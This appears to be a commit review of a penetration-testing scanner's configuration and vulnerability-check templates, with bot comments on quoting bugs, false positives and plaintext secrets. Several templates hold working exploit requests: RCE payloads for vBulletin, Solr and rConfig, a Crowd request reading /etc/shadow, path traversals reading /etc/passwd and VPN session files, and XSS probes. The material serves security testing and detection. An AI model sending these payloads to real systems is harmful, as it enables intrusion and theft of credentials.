DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
# TOOL DIRECTORIES
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
# FLYOVER MODE TUNING
FLYOVER_MAX_HOSTS="5"
FLYOVER_DELAY="10"
# NMAP OPTIONS
NMAP_OPTIONS="--script-args http.useragent='' --open"
# NMAP PORT CONFIGURATIONS
QUICK_PORTS="21,22,80,443,8000,8080,8443"
DEFAULT_PORTS="10000,1099,110,111,123,135,137,139,1433,1524,161,162,16992,2049,21,2121,2181,22,23,25,264,27017,27018,27019,28017,3128,3306,3310,3389,3632,389,443,4443,445,49152,49180,500,512,513,514,53,5432,5555,5800,5900,5984,623,624,6667,67,68,69,7001,79,80,8000,8001,8080,8180,8443,8888,9200,9495"
FULL_PORTSCAN_PORTS="T:1-65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:500,U:520,U:2049"
THREADS="100"
# NETWORK PLUGINS
NMAP_SCRIPTS="1"
METASPLOIT_EXPLOIT="1"
MSF_LEGACY_WEB_EXPLOITS="0"
SSH_AUDIT="1"
SSH_ENUM="1"
LIBSSH_BYPASS="1"
SMTP_USER_ENUM="1"
FINGER_TOOL="1"
SHOW_MOUNT="1"
RPC_INFO="1"
SMB_ENUM="1"
AMAP="0"
# OSINT PLUGINS
WHOIS="1"
GOOHAK="1"
INURLBR="1"
THEHARVESTER="1"
METAGOOFIL="1"
HUNTERIO="0"
TOMBAIO="0"
INTODNS="1"
EMAILFORMAT="1"
ULTRATOOLS="1"
URLCRAZY="1"
VHOSTS="0"
H8MAIL="0"
GITHUB_SECRETS="0"
URLSCANIO="1"
# DYNAMIC APPLICATION SCANNERS
BURP_SCAN="0"
ARACHNI_SCAN="0"
ZAP_SCAN="0"
# ACTIVE WEB PLUGINS
SC0PE_VULNERABLITY_SCANNER="1"
NUCLEI="1"
DIRSEARCH="1"
GOBUSTER="0"
NIKTO="0"
BLACKWIDOW="1"
INJECTX="1"
CLUSTERD="0"
WPSCAN="0"
CMSMAP="0"
WAFWOOF="1"
WHATWEB="1"
WIG="0"
SHOCKER="0"
JEXBOSS="0"
WEBTECH="1"
SSL_INSECURE="1"
HTTP_PROBE="0"
SMUGGLER="1"
# PASSIVE WEB PLUGINS
WAYBACKMACHINE="1"
SSL="1"
PASSIVE_SPIDER="1"
GAU="1"
HACKERTARGET="1"
CUTYCAPT="0"
WEBSCREENSHOT="1"
# EMAIL PLUGINS
SPOOF_CHECK="1"
# RECON PLUGINS
SUBHIJACK_CHECK="0"
AQUATONE="0"
SLURP="0"
SUBLIST3R="0"
AMASS="0"
SUBFINDER="0"
DNSCAN="0"
CRTSH="1"
SUBOVER="0"
PROJECT_SONAR="1"
CENSYS_SUBDOMAINS="0"
SUBNET_RETRIEVAL="1"
SUBJACK="0"
ALT_DNS="0"
MASS_DNS="0"
DNSGEN="0"
SHODAN="0"
ASN_CHECK="1"
SPYSE="0"
SUBBRUTE_DNS="0"
GITHUB_SUBDOMAINS="0"
RAPIDDNS="1"
SCAN_ALL_DISCOVERED_DOMAINS="0"
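Review bot: `INURLBR` is assigned twice in this file: `INURLBR="$INSTALL_DIR/bin/inurlbr.php"` under TOOL DIRECTORIES and then `INURLBR="1"` under OSINT PLUGINS, so the on/off flag overwrites the tool path and anything that executes `$INURLBR` will try to run a program called `1`; rename one of them (for example `INURLBR_BIN` for the path). `GREP_EXTENSIONS` contains two broken alternatives, `\.achee` (presumably `\.cache`) and `| plist`, which lacks the `\.` and carries a leading space, so it matches any word `plist` preceded by a space. `OUT_OF_SCOPE` values are passed straight to `egrep` by `init`, where `"*.sn1persecurity.com"` is not a glob: a leading `*` has no wildcard meaning in a regex and the unescaped dots match any character, so either escape the entries or match them as fixed strings. `VULNSCAN="0"` is the only AUX MODE OVERRIDE left uncommented next to `# AUTO_BRUTE`, `# FULLNMAPSCAN` and `# OSINT`, which looks unintentional and will force the mode off regardless of the switch. Finally, this file stores OpenVAS and Nessus passwords and Shodan, Censys, Hunter.io, Tomba.io, GitHub and WPScan API keys in plaintext while the main script runs `chmod 777 -Rf $INSTALL_DIR`, so every secret is readable by any local user; move credentials to a separate 0600 file or environment variables.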


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AWS S3 Public Bucket Listing'
URI=''
METHOD='GET'
MATCH="listbucket"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
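Review bot: `MATCH="listbucket"` with `GREP_OPTIONS='-i'` is broader than `VULN_NAME` implies: it fires on any response body containing that substring, including documentation or error text that merely mentions the operation, not only an actual public listing. Matching the root element of a successful listing, `<ListBucketResult`, keeps the check specific to the condition being reported.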


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability'
URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/'
METHOD='GET'
MATCH="<title>phpinfo\(\)"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
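Review bot: the `URI` assignment is broken by its own quoting: inside a single-quoted value a `'` terminates the literal, so the shell concatenates `'/index.php?b);phpinfo();echo(base64_decode('`, the bare word `T3BlblZBUwo` and `')=/'`, and the inner quotes around the base64 argument never make it into the request. If the inner quotes are meant to be literal, the whole value has to be double-quoted (or written with `$'...'`); as committed, the path sent is not the one the template author intended and the check will report nothing on affected hosts.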


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Solr Detected'
URI=''
METHOD='GET'
MATCH="Solr\ Admin"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='Apache Tomcat Detected'
URI='/404_DOES_NOT_EXIST'
METHOD='GET'
MATCH="Apache\ Tomcat\/[0-9]?[0-9]\.[0-9]?[0-9]\.[0-9]?[0-9]"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-o'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='AvantFAX LOGIN Detected'
URI=''
METHOD='GET'
MATCH="AvantFAX\ LOGIN"
SEVERITY='P5 - INFO'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal'
URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
METHOD='GET'
MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
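Review bot: `VULN_NAME` mislabels the finding. CVE-2018-13379 is the FortiOS SSL VPN path traversal (the `/remote/fgt_lang` path in `URI` and the `sslvpn_websession` file are Fortinet's), not Pulse Connect Secure, which is CVE-2019-11510 and has its own template in this commit. Drop "Pulse Connect Secure" from the name so report output and any dedup keyed on the name are correct.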


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read'
URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
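Review bot: curl normalises dot segments in the request path by default (since 7.42, unless `--path-as-is` is given), so the `/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?...` in `URI` is squashed before it leaves the scanner and the traversal is never actually exercised; the result is a systematic false negative on vulnerable appliances. The same applies to the CVE-2019-19781 template (`/vpn/../vpns/cfg/smb.conf`) and the CVE-2019-5418 template (leading `/../../`) further down, and `CURL_OPTS` is the natural place to add the flag. Separately, `MATCH="root:*:"` is a regex in which `:*` can match zero colons, so it matches `root:` anywhere in a body; anchoring on the full first passwd field shape (`^root:x?:0:0:` with `GREP_OPTIONS='-E'`) would cut false positives on pages that merely contain the word.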


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11580 - Atlassian Crowd Data Center Unauthenticated RCE'
URI='/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-11581 - Jira Template Injection'
URI='/secure/ContactAdministrators!default.jspa'
METHOD='GET'
MATCH='Contact Site Administrators'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
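Review bot: `MATCH='Contact Site Administrators'` only confirms that the ContactAdministrators form is reachable, which is true for any Jira instance with the contact form enabled, patched or not; reporting that as `P1 - CRITICAL` will flag every such instance and bury real findings. Either downgrade this to an informational exposure check and rename it accordingly, or gate the severity on a version fingerprint against the fixed releases.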


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure'
URI="/cgi-bin/config.exp"
METHOD='GET'
MATCH="sysconfig"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16662 - rConfig 3.9.2 Remote Code Execution'
URI='/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution'
URI='/'
METHOD='POST'
MATCH='1787569'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1787568))%27%29%3B+exit%3B" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution Bypass'
URI='/ajax/render/widget_tabbedcontainer_tab_panel'
METHOD='POST'
MATCH='PHP\ Version'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='-d "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();" -H "Content-Type: application/x-www-form-urlencoded" --user-agent "" -s -L --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-17558 - Apache Solr RCE'
URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
METHOD='GET'
MATCH="root:*:"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,14 @@
# Import any WebDriver class that you would usually import from
# selenium.webdriver from the seleniumrequests module
import sys
from seleniumrequests import Firefox
url = sys.argv[1]
# Simple usage with built-in WebDrivers:
webdriver = Firefox()
response = webdriver.request('GET', '%s/en/embeddedAuthRedirect.html?auth=javascript:document.write(1+1336)' % url)
if '1337' in response.text:
print("Vulnerable!")
print(response.text)
webdriver.quit()
SECONDARY_COMMANDS=''
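Review bot: the trailing `SECONDARY_COMMANDS=''` is a leftover from the shell template format; it happens to parse as Python but does nothing here and should be removed. The script also prints `response.text` unconditionally, so every run dumps the full page body even when the check did not fire (it belongs under the `if`), exits with a traceback when `sys.argv[1]` is absent, and never reaches `webdriver.quit()` if `request()` raises, leaking a Firefox process per failed host; wrap the request in `try/finally`. `'1337' in response.text` is a bare substring test that any page containing "1337" will satisfy, and `Firefox()` will open a visible browser window unless a headless option is passed, which is not what a batch scanner wants.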


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal'
URI='/vpn/../vpns/cfg/smb.conf'
METHOD='GET'
MATCH='\[global\]'
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS'
URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E"
METHOD='GET'
MATCH="<script>alert\(1337\)<\/script>"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails'
URI="/../../../../../../../../etc/passwd\{\{"
METHOD='GET'
MATCH="root:*:"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
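Review bot: inside a double-quoted assignment `\{` is not an escape sequence, so `URI` ends with the literal four bytes `\{\{` and curl sends them as-is; combined with curl's default squashing of the leading `/../../../../../../../../`, the path that actually goes out is `/etc/passwd\{\{`, which is not a meaningful probe for this issue. `--path-as-is` in `CURL_OPTS` and an unescaped `{{` would at least send what the template describes. Note also that CVE-2019-5418 is triggered through a request header rather than the URL path, so a path-only probe does not exercise the vulnerable code and will miss affected Rails versions; as written the template can only produce false negatives.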


@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-6340 - Drupal8 REST RCE SA-CORE-2019-003'
URI='/node/1?_format=hal_json'
METHOD='GET'
MATCH='INVALID_VALUE\ does\ not\ correspond'
SEVERITY='P1 - CRITICAL'
CURL_OPTS='--user-agent "" -s -L --insecure -H "Content-Type: application/hal+json" --data \'{ "_links": { "type": { "href": "http://192.168.56.101/drupal-8.6.9/rest/type/node/INVALID_VALUE" } }, "type": { "target_id": "article" }, "title": { "value": "My Article" }, "body": { "value": "some body content aaa bbb ccc" }}\' '
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
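Review bot: the `CURL_OPTS=` line will not parse if these templates are sourced by the shell. A single-quoted string cannot contain `\'`: the value terminates at `--data \` (the backslash is literal inside single quotes), and everything from `{ "_links": ...` onward becomes stray shell words. Put the whole value in double quotes and escape the inner `"` characters, or build the JSON body in a separate variable and reference it as `--data \"$BODY\"`. Also, the `href` hard-codes a lab host and version (`http://192.168.56.101/drupal-8.6.9/...`) that has nothing to do with the scanned target; it should be derived from the target base URL or left as a clearly named placeholder, and the hard-coded value documented.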

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-7192 - QNAP Pre-Auth Root RCE'
URI='/photo/p/api/video.php'
METHOD='GET'
MATCH="\[\ 401\ Unauthorized\ \]"
SEVERITY='P1 - CRITICAL'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
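Review bot: `MATCH="\[\ 401\ Unauthorized\ \]"` only confirms that `/photo/p/api/video.php` exists and rejects anonymous requests; it does not distinguish a patched Photo Station from a vulnerable one, so with `SEVERITY='P1 - CRITICAL'` this will raise critical findings on fully patched hosts. Either add a version check to the match, or lower the severity and rename the check to make clear that it only detects the endpoint's presence.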

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 1'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
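Review bot: `CURL_OPTS='-L --user-agent '' -s --insecure'` has broken quoting. The `''` in the middle closes and immediately reopens the single-quoted string, so the value is `-L --user-agent  -s --insecure` and curl takes `-s` as the User-Agent value while silent mode is never enabled. The other templates use the working form `CURL_OPTS="--user-agent '' -s -L --insecure"` (double quotes outside); use that here for consistency.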

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8442 - Jira Webroot Directory Traversal 2'
URI="/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties"
METHOD='GET'
MATCH='artifactId'
SEVERITY='P2 - HIGH'
CURL_OPTS='-L --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
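Review bot: same quoting defect as the sibling pom.xml template. In `CURL_OPTS='-L --user-agent '' -s --insecure'` the `''` terminates and reopens the single-quoted string, so `--user-agent` receives `-s` as its value and silent mode is lost; switch to `CURL_OPTS="-L --user-agent '' -s --insecure"` as the other templates do.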

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 1'
URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
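Review bot: the `CURL_OPTS=` value is malformed. The header argument `"X-Atlassian-Token: no-check` never closes its double quote, and the `''` after `--user-agent` ends the outer single-quoted string, so after word splitting curl receives `-H "X-Atlassian-Token:` plus `no-check`, `--user-agent`, `-s` as separate arguments and the header is never sent correctly. A working form is `CURL_OPTS="-L -H 'X-Atlassian-Token: no-check' --user-agent '' -s --insecure"`. Note also that the check depends on the scanned host being able to reach google.com and on Google keeping `<title>Google</title>`, so a miss here does not prove the absence of the issue.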

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 2'
URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
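Review bot: `CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'` is missing the closing `"` after `no-check`, and the `''` breaks out of the single-quoted string, so the `-H` header is split into stray arguments and never sent intact. Use `CURL_OPTS="-L -H 'X-Atlassian-Token: no-check' --user-agent '' -s --insecure"`, the same fix needed in the other CVE-2019-8451 templates.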

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 3'
URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
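Review bot: same malformed `CURL_OPTS=` as the other CVE-2019-8451 templates: the `"X-Atlassian-Token: no-check` header lacks its closing `"` and the `''` terminates the single-quoted string, so the header is not delivered as one argument. Replace with `CURL_OPTS="-L -H 'X-Atlassian-Token: no-check' --user-agent '' -s --insecure"`.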

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8451 Jira SSRF 4'
URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com"
METHOD='GET'
MATCH='<title>Google</title>'
SEVERITY='P3 - MEDIUM'
CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure'
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
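Review bot: `CURL_OPTS=` has the unclosed `"X-Atlassian-Token: no-check` header and the stray `''` seen in the sibling SSRF templates; as written, word splitting scatters the header across several arguments. Use `CURL_OPTS="-L -H 'X-Atlassian-Token: no-check' --user-agent '' -s --insecure"`. Since the four CVE-2019-8451 templates differ only in the context path (`/`, `/jira`, `/wiki`, `/confluence`), consider fixing the quoting once in a shared snippet rather than in four copies.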

View File

@@ -0,0 +1,9 @@
AUTHOR='@xer0dayz'
VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal'
URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
METHOD='GET'
MATCH="apache2\.conf"
SEVERITY='P2 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'
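Review bot: `VULN_NAME` misspells "Unauthenticated" as `Unathenticated`; this string ends up in reports, so fix it before merge. The match `MATCH="apache2\.conf"` relies on the target serving the stock Debian/Ubuntu Apache landing page at `/var/www/html/index.html`, so any customised or non-Debian deployment produces a false negative even when the traversal succeeds; a more robust signal would be to match on content that is present regardless of distribution, or to document the assumption in the template.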
